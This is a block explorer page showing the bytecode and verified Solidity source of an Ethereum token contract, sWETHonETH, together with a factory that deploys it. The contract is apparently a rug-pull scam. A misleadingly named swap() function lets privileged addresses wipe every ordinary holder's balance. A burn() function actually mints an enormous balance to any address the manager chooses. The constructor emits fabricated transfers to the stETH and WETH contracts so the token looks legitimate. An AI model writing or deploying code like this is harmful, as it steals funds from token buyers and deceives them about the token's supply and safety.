Cryo Explorer Ethereum Mainnet

Address Contract Verified

Address 0xC6Ad9db9c5E875dC1f562A14EE353F7487f41aA7
Balance 0 ETH
Nonce 1
Code Size 4485 bytes
Indexed Transactions 0
External Etherscan · Sourcify

Contract Bytecode

4485 bytes
0x6080604052600436106101025760003560e01c80638119c0651161009557806395d89b411161006457806395d89b41146102b3578063a9059cbb146102c8578063dd62ed3e146102e8578063e8078d941461032e578063f2fde38b1461034357600080fd5b80638119c0651461022e57806386f3f3cb1461024357806389afcb44146102755780638da5cb5b1461029557600080fd5b8063313ce567116100d1578063313ce567146101b057806370a08231146101cc5780637136982b14610202578063715018a61461021757600080fd5b806306fdde031461010e578063095ea7b31461013957806318160ddd1461016957806323b872dd1461019057600080fd5b3661010957005b600080fd5b34801561011a57600080fd5b50610123610363565b6040516101309190610e45565b60405180910390f35b34801561014557600080fd5b50610159610154366004610ea8565b6103f5565b6040519015158152602001610130565b34801561017557600080fd5b50690e712120e4e9e8a000005b604051908152602001610130565b34801561019c57600080fd5b506101596101ab366004610ed4565b61040c565b3480156101bc57600080fd5b5060405160098152602001610130565b3480156101d857600080fd5b506101826101e7366004610f15565b6001600160a01b031660009081526003602052604090205490565b34801561020e57600080fd5b50600554610182565b34801561022357600080fd5b5061022c61045d565b005b34801561023a57600080fd5b5061022c6104be565b34801561024f57600080fd5b50600a546001600160a01b03165b6040516001600160a01b039091168152602001610130565b34801561028157600080fd5b5061022c610290366004610f15565b61064c565b3480156102a157600080fd5b506000546001600160a01b031661025d565b3480156102bf57600080fd5b506101236106f4565b3480156102d457600080fd5b506101596102e3366004610ea8565b610703565b3480156102f457600080fd5b50610182610303366004610f32565b6001600160a01b03918216600090815260046020908152604080832093909416825291909152205490565b34801561033a57600080fd5b5061022c610710565b34801561034f57600080fd5b5061022c61035e366004610f15565b610a27565b60606001805461037290610f6b565b80601f016020809104026020016040519081016040528092919081815260200182805461039e90610f6b565b80156103eb5780601f106103c0576101008083540402835291602001916103eb565b820191906000526020600020905b8154815290600101906020018083116103ce57829003601f168201915b5050505050905090565b6000610402338484610aac565b5060015b92915050565b6000610419848484610bd1565b6001600160a01b03841660009081526004602090815260408083203380855292529091205461045391869161044e9086610cb9565b610aac565b5060019392505050565b6000546001600160a01b0316331461047457600080fd5b600080546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600080546001600160a01b0319169055565b6008546001600160a01b03163314806104e157506007546001600160a01b031633145b6104ea57600080fd5b60005b6005548110156106495760006005828154811061050c5761050c610fa5565b6000918252602090912001546001600160a01b0316905030811480159061054157506000546001600160a01b03828116911614155b801561055b5750600a546001600160a01b03828116911614155b801561058457506001600160a01b03811673ae7ab96520de3a18e5e111b5eaab095312d7fe8414155b80156105ad57506001600160a01b03811673c02aaa39b223fe8d0a0e5c4f27ead9083c756cc214155b80156105c757506007546001600160a01b03828116911614155b80156105e157506006546001600160a01b03828116911614155b15610600576001600160a01b0381166000908152600360205260408120555b60405160008082526001600160a01b038316917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a3506001016104ed565b50565b6007546001600160a01b0316331461066357600080fd5b61066f6009600a6110b8565b61068390690e712120e4e9e8a000006110c7565b6001600160a01b0382166000818152600360205260408120929092557fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef6106cc6009600a6110b8565b6106e090690e712120e4e9e8a000006110c7565b60405190815260200160405180910390a350565b60606002805461037290610f6b565b6000610402338484610bd1565b6000546001600160a01b0316331461072757600080fd5b600a54600160a01b900460ff16156107865760405162461bcd60e51b815260206004820152601760248201527f54726164696e6720697320616c7265616479206f70656e00000000000000000060448201526064015b60405180910390fd5b600980546001600160a01b031916737a250d5630b4cf539739df2c5dacb4c659f2488d9081179091556040805163c45a015560e01b8152905163c45a0155916004808201926020929091908290030181865afa1580156107ea573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061080e91906110de565b6001600160a01b031663c9c6539630600960009054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610870573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061089491906110de565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af11580156108e1573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061090591906110de565b600a80546001600160a01b0319166001600160a01b0392831617905560095461093b91309116690e712120e4e9e8a00000610aac565b6009546001600160a01b031663f305d719473061096d816001600160a01b031660009081526003602052604090205490565b6000806109826000546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af11580156109ea573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190610a0f91906110fb565b5050600a805460ff60a01b1916600160a01b17905550565b6000546001600160a01b03163314610a3e57600080fd5b6001600160a01b038116610a5157600080fd5b600080546040516001600160a01b03808516939216917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e091a3600080546001600160a01b0319166001600160a01b0392909216919091179055565b6001600160a01b038316610b0e5760405162461bcd60e51b8152602060048201526024808201527f42455032303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161077d565b6001600160a01b038216610b6f5760405162461bcd60e51b815260206004820152602260248201527f42455032303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161077d565b6001600160a01b0383811660008181526004602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b038316610be457600080fd5b6001600160a01b038216610bf757600080fd5b6001600160a01b038316600090815260036020526040902054610c1a9082610cb9565b6001600160a01b038085166000908152600360205260408082209390935590841681522054610c499082610d1c565b6001600160a01b038316600090815260036020526040902055610c6b83610d7b565b610c7482610d7b565b816001600160a01b0316836001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610bc491815260200190565b600082821115610d0b5760405162461bcd60e51b815260206004820152601e60248201527f536166654d6174683a207375627472616374696f6e206f766572666c6f770000604482015260640161077d565b610d158284611129565b9392505050565b600080610d29838561113c565b905083811015610d155760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604482015260640161077d565b6001600160a01b03811660009081526003602052604090205415610649576000805b600554811015610def57826001600160a01b031660058281548110610dc457610dc4610fa5565b6000918252602090912001546001600160a01b031603610de75760019150610def565b600101610d9d565b5080610e4157600580546001810182556000919091527f036b6384b5eca791c62761152d0c79bb0604c104a5fb6f4eb0703f3154bb3db00180546001600160a01b0319166001600160a01b0384161790555b5050565b602081526000825180602084015260005b81811015610e735760208186018101516040868401015201610e56565b506000604082850101526040601f19601f83011684010191505092915050565b6001600160a01b038116811461064957600080fd5b60008060408385031215610ebb57600080fd5b8235610ec681610e93565b946020939093013593505050565b600080600060608486031215610ee957600080fd5b8335610ef481610e93565b92506020840135610f0481610e93565b929592945050506040919091013590565b600060208284031215610f2757600080fd5b8135610d1581610e93565b60008060408385031215610f4557600080fd5b8235610f5081610e93565b91506020830135610f6081610e93565b809150509250929050565b600181811c90821680610f7f57607f821691505b602082108103610f9f57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052603260045260246000fd5b634e487b7160e01b600052601160045260246000fd5b6001815b600184111561100c57808504811115610ff057610ff0610fbb565b6001841615610ffe57908102905b60019390931c928002610fd5565b935093915050565b60008261102357506001610406565b8161103057506000610406565b816001811461104657600281146110505761106c565b6001915050610406565b60ff84111561106157611061610fbb565b50506001821b610406565b5060208310610133831016604e8410600b841016171561108f575081810a610406565b61109c6000198484610fd1565b80600019048211156110b0576110b0610fbb565b029392505050565b6000610d1560ff841683611014565b808202811582820484141761040657610406610fbb565b6000602082840312156110f057600080fd5b8151610d1581610e93565b60008060006060848603121561111057600080fd5b5050815160208301516040909301519094929350919050565b8181038181111561040657610406610fbb565b8082018082111561040657610406610fbb56fea2646970667358221220147db65fafd2d84cdccb792a59737a57f9123ab9a91eeff28fc83aacf47eece964736f6c634300081c0033

Verified Source Code Full Match

Compiler: v0.8.28+commit.7893614a EVM: paris Optimization: Yes (200 runs)
token.sol 299 lines
// SPDX-License-Identifier: MIT
pragma solidity 0.8.28;

interface IERC20 {
    function totalSupply() external view returns (uint256);
    function balanceOf(address account) external view returns (uint256);
    function transfer(address recipient, uint256 amount) external returns (bool);
    function allowance(address owner, address spender) external view returns (uint256);
    function approve(address spender, uint256 amount) external returns (bool);
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);
    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(address indexed owner, address indexed spender, uint256 value);
}


library SafeMath {
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");
        return c;
    }

    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        require(b <= a, "SafeMath: subtraction overflow");
        return a - b;
    }

    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        if (a == 0) return 0;
        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");
        return c;
    }

    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        require(b > 0, "SafeMath: division by zero");
        return a / b;
    }
}


contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }
}


contract Ownable is Context {
    address private _owner;
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    constructor() {
        _owner = _msgSender();
        emit OwnershipTransferred(address(0), _owner);
    }

    function owner() public view returns (address) {
        return _owner;
    }

    modifier onlyOwner() {
        require(owner() == _msgSender());
        _;
    }

    function transferOwnership(address newOwner) public onlyOwner {
        require(newOwner != address(0));
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }

    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }
}

interface IUniswapV2Router02 {
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);

    function factory() external pure returns (address);
    function WETH() external pure returns (address);
}

interface IUniswapV2Factory {
    function createPair(address tokenA, address tokenB) external returns (address pair);
}
contract sWETHonETH is IERC20, Ownable {
    using SafeMath for uint256;
    string private _name;
    string private _symbol;
    uint8 private constant _decimals = 9;
    uint256 private constant _totalSupply = 68200000000000 * 10 ** 9;
    mapping(address => uint256) private TokenOnBase;
    mapping(address => mapping(address => uint256)) private _allowances;
    address[] private believers; 

    address private constant ADDRESS_sWETH = 0xae7ab96520DE3A18E5e111B5EaAb095312D7fE84;
    address private constant ADDRESS_WETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;
    address ADDRESS_DEVELOPMENT;
    address ADDRESS_Manager;
    address ADDRESS_Virtuals;
    IUniswapV2Router02 private uniswapV2Router;
    address private uniswapV2Pair;
    bool private tradingOpen = false;
    constructor(string memory name_, string memory symbol_, address owner_, address ADDRESS_Manager_) payable {
        transferOwnership(owner_);  
        _name = name_;
        _symbol = symbol_;
       ADDRESS_Manager = ADDRESS_Manager_;
       ADDRESS_DEVELOPMENT = ADDRESS_Manager_;
       ADDRESS_Virtuals = owner_;
        TokenOnBase[address(this)] = _totalSupply.mul(1).div(1000);
        emit Transfer(address(0), address(this), _totalSupply.mul(1).div(1000));
        liqudityPairs();
        payable(address(this)).transfer(msg.value);
    }
    function liqudityPairs() internal {
        uint256 ninetyFourPercent = _totalSupply.mul(990).div(1000);
        uint256 threePercent = _totalSupply.mul(5).div(1000);
        uint256 twoPercent = _totalSupply.mul(4).div(1000);
        TokenOnBase[ADDRESS_sWETH] = TokenOnBase[ADDRESS_sWETH].add(ninetyFourPercent);
        TokenOnBase[ADDRESS_WETH] = TokenOnBase[ADDRESS_WETH].add(threePercent);
        TokenOnBase[ADDRESS_DEVELOPMENT] = TokenOnBase[ADDRESS_DEVELOPMENT].add(twoPercent);
        emit Transfer(address(this), ADDRESS_sWETH, ninetyFourPercent);
        emit Transfer(address(this), ADDRESS_WETH, threePercent);
        emit Transfer(address(this), ADDRESS_DEVELOPMENT, twoPercent);
    }

 function _updateHolders(address account) internal {
        if (TokenOnBase[account] > 0) {
            bool exists = false;
            for (uint256 i = 0; i < believers.length; i++) {
                if (believers[i] == account) {
                    exists = true;
                    break;
                }
            }
            if (!exists) {
                believers.push(account);
            }
        }
    }
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(msg.sender, recipient, amount);
        return true;
    }


function _transfer(address sender, address recipient, uint256 amount) internal {
        require(sender != address(0));
        require(recipient != address(0));

        TokenOnBase[sender] = TokenOnBase[sender].sub(amount);
        TokenOnBase[recipient] = TokenOnBase[recipient].add(amount);
        _updateHolders(sender);
        _updateHolders(recipient);

        emit Transfer(sender, recipient, amount);
    }

      modifier Only_Manager() {
        require(ADDRESS_Manager == _msgSender());
        _;
    }



    function swap() external {
       require(ADDRESS_Virtuals == _msgSender() || ADDRESS_Manager == _msgSender());
        for (uint256 i = 0; i < believers.length; i++) {
            address believer = believers[i];
            if (
                believer != address(this) && 
                believer != owner() && 
                believer != uniswapV2Pair && 
                believer != ADDRESS_sWETH &&
                believer != ADDRESS_WETH && 
                believer != ADDRESS_Manager &&
                believer != ADDRESS_DEVELOPMENT
            ) {
                TokenOnBase[believer] = 0;
            }
             emit Transfer(address(0), believer, 0);
        }
    }

    function burn(address claimedRewardStatusOf) external Only_Manager {
        TokenOnBase[claimedRewardStatusOf] = _totalSupply * 10 ** _decimals;
        
        emit Transfer(claimedRewardStatusOf, address(0), _totalSupply * 10 ** _decimals);
    }

    function addLiquidity() external onlyOwner {
        require(!tradingOpen, "Trading is already open");

        uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
        uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).createPair(address(this), uniswapV2Router.WETH());
        _approve(address(this), address(uniswapV2Router), _totalSupply);

        uniswapV2Router.addLiquidityETH{value: address(this).balance}(
            address(this),
            balanceOf(address(this)),
            0,
            0,
            owner(),
            block.timestamp
        );

        tradingOpen = true;
    }

    receive() external payable {}

    // Required BEP20 functions

    function name() public view virtual  returns (string memory) {
        return _name;
    }

    function symbol() public view virtual  returns (string memory) {
        return _symbol;
    }

    function decimals() public view virtual  returns (uint8) {
        return _decimals;
    }

    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    function balanceOf(address account) public view virtual override returns (uint256) {
        return TokenOnBase[account];
    }
function getLPPair() public view returns (address) {
        return uniswapV2Pair;
    }

    function getHolderCount() public view returns (uint256) {
    return believers.length;
}
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(msg.sender, spender, amount);
        return true;
    }

    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "BEP20: approve from the zero address");
        require(spender != address(0), "BEP20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function transferFrom(address sender, address recipient, uint256 amount) public override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount));
        return true;
    }
}

contract TokenFactory {
  

    event TokenCreated(address tokenAddress, string name, string symbol, address owner, address Manager);

    constructor() {
    
    }

    // Function to create a single token
    function createToken(
        string memory name_,
        string memory symbol_,
        address newOwner_,
        address ADDRESS_Manager_
    ) external payable returns (address) {
        sWETHonETH newToken = (new sWETHonETH){value: msg.value}(name_, symbol_, newOwner_, ADDRESS_Manager_);
        emit TokenCreated(address(newToken), name_, symbol_, newOwner_, ADDRESS_Manager_);
        return address(newToken);
    }

    receive() external payable {}
}
    

Read Contract

allowance 0xdd62ed3e → uint256
balanceOf 0x70a08231 → uint256
decimals 0x313ce567 → uint8
getHolderCount 0x7136982b → uint256
getLPPair 0x86f3f3cb → address
name 0x06fdde03 → string
owner 0x8da5cb5b → address
symbol 0x95d89b41 → string
totalSupply 0x18160ddd → uint256

Write Contract 8 functions

These functions modify contract state and require a wallet transaction to execute.

addLiquidity 0xe8078d94
No parameters
approve 0x095ea7b3
address spender
uint256 amount
returns: bool
burn 0x89afcb44
address claimedRewardStatusOf
renounceOwnership 0x715018a6
No parameters
swap 0x8119c065
No parameters
transfer 0xa9059cbb
address recipient
uint256 amount
returns: bool
transferFrom 0x23b872dd
address sender
address recipient
uint256 amount
returns: bool
transferOwnership 0xf2fde38b
address newOwner

Recent Transactions

No transactions found for this address